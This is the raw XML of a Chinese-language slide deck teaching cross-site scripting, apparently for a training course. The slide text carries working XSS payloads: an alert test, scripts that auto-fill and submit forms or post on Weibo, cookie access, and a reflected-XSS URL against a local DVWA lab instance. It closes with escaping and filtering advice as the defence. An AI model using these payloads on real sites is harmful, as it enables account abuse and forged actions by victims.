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876" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId55"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId56"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="339" r:id="rId4"/>
    <p:sldId id="341" r:id="rId5"/>
    <p:sldId id="342" r:id="rId6"/>
    <p:sldId id="267" r:id="rId7"/>
    <p:sldId id="343" r:id="rId8"/>
    <p:sldId id="340" r:id="rId9"/>
    <p:sldId id="344" r:id="rId10"/>
    <p:sldId id="345" r:id="rId11"/>
    <p:sldId id="346" r:id="rId12"/>
    <p:sldId id="348" r:id="rId13"/>
    <p:sldId id="349" r:id="rId14"/>
    <p:sldId id="350" r:id="rId15"/>
    <p:sldId id="347" r:id="rId16"/>
    <p:sldId id="351" r:id="rId17"/>
    <p:sldId id="352" r:id="rId18"/>
    <p:sldId id="353" r:id="rId19"/>
    <p:sldId id="354" r:id="rId20"/>
    <p:sldId id="355" r:id="rId21"/>
    <p:sldId id="356" r:id="rId22"/>
    <p:sldId id="357" r:id="rId23"/>
    <p:sldId id="359" r:id="rId24"/>
    <p:sldId id="360" r:id="rId25"/>
    <p:sldId id="358" r:id="rId26"/>
    <p:sldId id="361" r:id="rId27"/>
    <p:sldId id="362" r:id="rId28"/>
    <p:sldId id="363" r:id="rId29"/>
    <p:sldId id="364" r:id="rId30"/>
    <p:sldId id="365" r:id="rId31"/>
    <p:sldId id="376" r:id="rId32"/>
    <p:sldId id="369" r:id="rId33"/>
    <p:sldId id="370" r:id="rId34"/>
    <p:sldId id="371" r:id="rId35"/>
    <p:sldId id="372" r:id="rId36"/>
    <p:sldId id="373" r:id="rId37"/>
    <p:sldId id="374" r:id="rId38"/>
    <p:sldId id="377" r:id="rId39"/>
    <p:sldId id="378" r:id="rId40"/>
    <p:sldId id="367" r:id="rId41"/>
    <p:sldId id="368" r:id="rId42"/>
    <p:sldId id="366" r:id="rId43"/>
    <p:sldId id="381" r:id="rId44"/>
    <p:sldId id="380" r:id="rId45"/>
    <p:sldId id="379" r:id="rId46"/>
    <p:sldId id="383" r:id="rId47"/>
    <p:sldId id="382" r:id="rId48"/>
    <p:sldId id="384" r:id="rId49"/>
    <p:sldId id="385" r:id="rId50"/>
    <p:sldId id="386" r:id="rId51"/>
    <p:sldId id="387" r:id="rId52"/>
    <p:sldId id="388" r:id="rId53"/>
    <p:sldId id="389" r:id="rId54"/>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C100"/>
    <a:srgbClr val="333399"/>
    <a:srgbClr val="540694"/>
    <a:srgbClr val="6807B9"/>
    <a:srgbClr val="0000CC"/>
    <a:srgbClr val="A60BFE"/>
    <a:srgbClr val="3D046C"/>
    <a:srgbClr val="FF9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97" autoAdjust="0"/>
    <p:restoredTop sz="86321" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="129" d="100"/>
          <a:sy n="129" d="100"/>
        </p:scale>
        <p:origin x="144" y="20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05" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="4472" y="4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A9BD21-A13E-8048-B787-466EFF15D917}" type="datetimeFigureOut">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2017/10/8</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6FF516-FE47-1140-AE46-F5E416BF4B81}" type="slidenum">
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="467061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AAC351C0-6D6D-4B39-8738-A7C7486B0710}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2017/10/8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4870BEF-24BB-4678-92B8-D9C03FCDED1A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22183208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72B6D8C-6458-4548-BD75-3CEE170667F7}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1297139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10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384975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11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2058113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12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1201483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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="552569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user_545px_1208225_easyicon.net.png</a:t>
            </a:r>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2075429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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1316969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16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186588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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="658979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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="897389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19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="652648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2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8567747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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1864203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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2021029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&lt;script&gt;alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>你的名字</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’)&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>scirpt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16935794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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('input')[0].value='</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>autoinput</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>')[0].value='</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>autoinput</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’; </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('input')[1].click();&lt;/script&gt;</a:t>
            </a:r>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7962106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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="691827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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15722857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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1784738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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11361065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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5625999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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239855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任意执行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>有什么风险？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以任意更改网页内容，任意提交信息。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可以直接获取</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 可以添加任意标签</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('a')[50].attributes['</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>'].value='http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>baidu.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>微博：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>')[0].value=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.getElementsByClassName</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>W_btn_a</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> btn_30px')[0].click()</a:t>
            </a:r>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3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8387933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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1655174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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16052655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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318415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192.168.1.64/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss_r</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/?name=a&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> f1=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>('form');</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(f1);f1.action='/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/vulnerabilities/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>xss_s</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>/';f1.method='post';</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> i1=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("input");</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> i2=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("input");</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> i3=</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("input");f1.appendChild(i1);f1.appendChild(i2);f1.appendChild(i3);i1.name='txtName';i2.name='mtxMessage';i1.value='autoname';i2.value='automess';i3.name='btnSign';i3.value='Sign+Guestbook';f1.submit();&lt;%2Fscript&gt;#</a:t>
            </a:r>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10839098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39</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6311035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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6930718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sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>写入页面前先转义。在取值写入页面或动态执行的业务场景下，在将各种来源获取到的参数值传入</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三姐妹”函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>innerHTML</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document.write</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eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>）处理前，对传入数据中的</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特殊字符进行转义处理能防止大部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DOM-XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的产生。此外，根据不同业务的真实情况，还应使用正则表达式，针对传入的数据做更严格的过滤限制，才能保证万无一失。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
